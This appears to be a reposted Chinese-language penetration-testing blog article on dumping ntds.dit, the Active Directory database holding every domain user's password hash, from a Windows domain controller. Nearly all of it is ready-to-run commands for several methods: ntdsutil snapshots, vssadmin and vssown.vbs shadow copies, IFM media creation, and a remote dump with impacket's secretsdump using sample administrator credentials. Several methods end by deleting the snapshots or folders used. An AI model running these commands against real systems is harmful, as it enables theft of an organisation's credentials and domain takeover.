多種方式提取和移動ntds.dit檔案
目錄- 多種方式提取和移動ntds.dit檔案
- 一、ntds.dit檔案的介紹
- 二、ntdsutils.exe提取ntds.dit
- 三、vssadmin提取ntds.dit
- 四、vssown.vbs提取ntds.dit
- 五、IFM提取ntds.dit
- 六、secretsdump.exe提權ntds.dit
一、ntds.dit檔案的介紹
ntds.dit為Windows Active Directory資料庫的一個檔案,內容有域用戶、域組、用戶hash等資訊,域控上的ntds.dit只有可以登錄到域控的用戶(如域管用戶、DC本地管理員用戶)可以訪問,ntds.dit包括三個主要表:資料表、鏈接表、 sd表,所以只要在域滲透中能夠獲取到ntds.dit就可以獲取到所有域用戶的用戶名和對應的hash,它和SAM檔案一樣,被windows系統鎖死,
ntds.dit檔案位置:
C:\Windows\NTDS
二、ntdsutils.exe提取ntds.dit
ntdsutils.exe 是一個為活動目錄提供管理機制的命令列工具,使用 ntdsutils.exe 可以維護和管理活動目錄資料庫、控制單個主機操作、創建應用程式目錄磁區等,該工具默認安裝在域控服務器上,可以在域控制器上直接操作,支持windows server 2003、2008、2012,
1、創建快照
ntdsutil.exe snapshot "activate instance ntds" create q q
2、加載快照
ntdsutil.exe snapshot "mount {e5440db6-0ffa-47fa-9510-5708bc2f96b2}" q q
3、復制檔案
copy C:\$SNAP_202306161355_VOLUMEC$\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop
4、洗掉快照
ntdsutil.exe snapshot "umount {e5440db6-0ffa-47fa-9510-5708bc2f96b2}" "delete {e5440db6-0ffa-47fa-9510-5708bc2f96b2}" q q
三、vssadmin提取ntds.dit
vssadmin是Windows Server 2008及Windows 7系統提供的VSS管理工具,它可以用于創建或洗掉卷影副本,列出卷影副本的資訊(只能管理系統Provider創建的卷影副本),還可以用于顯示所有安裝的所有卷影副本寫入程式(writers)和提供程式(providers),以及改變卷影副本存盤空間(即所謂的 “diff空間”)的大小等,支持的作業系統:Server 2008、Server 2012,
1、創建快照
vssadmin create shadow /for=c:
2、復制檔案
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop
3、洗掉快照
vssadmin delete shadows /for=c: /quiet
四、vssown.vbs提取ntds.dit
vssown.vbs和vssadmin類似,它是由Tim Tomes開發完成的,它可以創建和洗掉卷影副本,以及啟動和停止卷影復制服務,
1、啟動卷影復制服務
cscript vssown.vbs /start
2、創建一個C盤的卷影副本
cscript vssown.vbs /create c
3、列出當前卷影副本
cscript vssown.vbs /list
4、復制檔案
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop
5、洗掉卷影副本
cscript vssown.vbs /delete {A60DA168-8678-4A85-A244-874250A93C1F}
五、IFM提取ntds.dit
可以通過創建一個IFM 的方式獲取ntds.dit,在使用 ntdsutil 創建媒體安裝集(IFM)時,需要進行生成快照、加載、將 ntds.dit 和計算機的 SAM 檔案復制到目標檔案夾中等操作,這些操作也可以通過 PowerShell 或 VMI 遠程執行,
1、生成檔案
ntdsutil "ac i ntds" "ifm" "create full c:/test" q q
此時 ntds.dit 將被保存在 C:\test\Active Directory 下,SYSTEN 和 SECURITY 兩個檔案將被保存在 C:\test\registry 檔案夾下,
2、洗掉目錄
rmdir /s/q C:\test
六、secretsdump.exe提權ntds.dit
通過 impacket 里的 secretsdump.py 腳本可以直接遠程讀取 ntds.dit 并匯出哈希值,
secretsdump.exe 域名/administrator:密碼@IP -outputfile output_ntds
這里密碼之前是admin@123,但是會沖突,導致會去訪問[email protected]的445埠,從而訪問失敗,所以改了密碼,
secretsdump.exe candada/administrator:[email protected] -outputfile output_ntds
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/555385.html
標籤:其他
上一篇:7個必備JavaScript優化技巧,CodeGeeX 5秒搞定了!
下一篇:返回列表